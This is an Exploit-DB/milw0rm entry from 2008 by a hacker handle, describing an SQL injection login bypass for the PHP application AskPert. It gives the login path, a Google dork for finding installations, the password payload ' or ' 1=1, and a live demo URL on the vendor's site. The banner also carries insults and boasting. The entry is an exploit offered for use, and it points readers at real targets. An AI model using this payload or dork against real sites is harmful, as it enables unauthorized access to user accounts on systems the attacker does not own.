AskPert - Authentication Bypass

EDB-ID:

7166

Author:

TR-ShaRk

Type:

webapps

Platform:

PHP

Published:

2008-11-19

##################WwW.TR-ShaRk.Co.cC###################
#AskPert  (Auth bypass) SQL Injection Vulnerability
##################WwW.TR-ShaRk.Co.cC###################

 ##################WwW.TR-ShaRk.Co.cC###################
 #[~] Author :  TR-ShaRk
 #[~] Msn : Starhack@tr-shark.org
 #[~] Web : WwW.TR-ShaRk.Co.cC
 #[~] I am Not Hacker
 #[~] Greetz :FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
 #[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
 #
 #[!] Script: http://www.w3matter.com/products/askpert
 #[!] Google_Dork:  Powered by AskPert
 ##################WwW.TR-ShaRk.Co.cC###################


 Go to ask/index.php?section=user&action=login

 Use following information to bypass login.

 Write any email Address as email address.It must to be in email format.

 For exapmple Starhack@TR-ShaRk.OrG

 For password use ' or ' 1=1


 #[~] LiveDemo:
 http://www.w3matter.com/ask/index.php?section=user&action=login

 ##################WwW.TR-ShaRk.Co.cC###################
 Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik | Ya Ezersin Yada Ezilirsin!
 ##################WwW.TR-ShaRk.Co.cC###################

# milw0rm.com [2008-11-19]